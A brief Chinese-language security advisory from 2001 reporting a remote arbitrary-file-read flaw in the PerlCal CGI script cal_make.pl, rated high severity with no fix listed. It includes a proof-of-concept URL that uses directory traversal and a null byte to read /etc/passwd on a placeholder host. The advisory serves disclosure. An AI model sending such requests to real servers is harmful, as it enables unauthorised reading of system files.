PerlCal (CGI) 程序 存在任意文件可查看问题发布时间:2001-04-28 更新时间:2001-04-28 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 任何运行了PerlCal CGI 脚本详细描述 PellCal CGI脚本中的cal_make.pl对用户输入没有很好的检查,可以导致远程用户查看WEB服务器上的任意文件。 测试代码 http://www.VULNERABLE.com/cgi-bin/cal_make.pl? p0=../../../../../../../../../../../../etc/passwd%00 解决方案 尚无 相关信息 stan@whizkunde.org http://www.whizkunde.org |
